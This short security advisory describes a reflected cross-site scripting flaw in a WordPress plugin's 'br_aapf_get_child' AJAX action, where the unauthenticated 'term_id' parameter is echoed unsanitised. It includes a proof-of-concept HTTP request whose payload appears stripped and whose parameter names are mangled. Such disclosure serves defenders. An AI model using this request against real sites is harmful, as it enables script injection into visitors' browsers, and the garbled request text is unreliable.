The br_aapf_get_child AJAX action of the plugin, available to both unauthenticated and authenticated users does not sanitise the ‘term_id’ POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Connection: keep-alive Upgrade-Insecure-Requests: 1 Cookie: [unauthenticated/any authenticated user] action=br_aapf_get_child&type;=any-string&term;_id=“”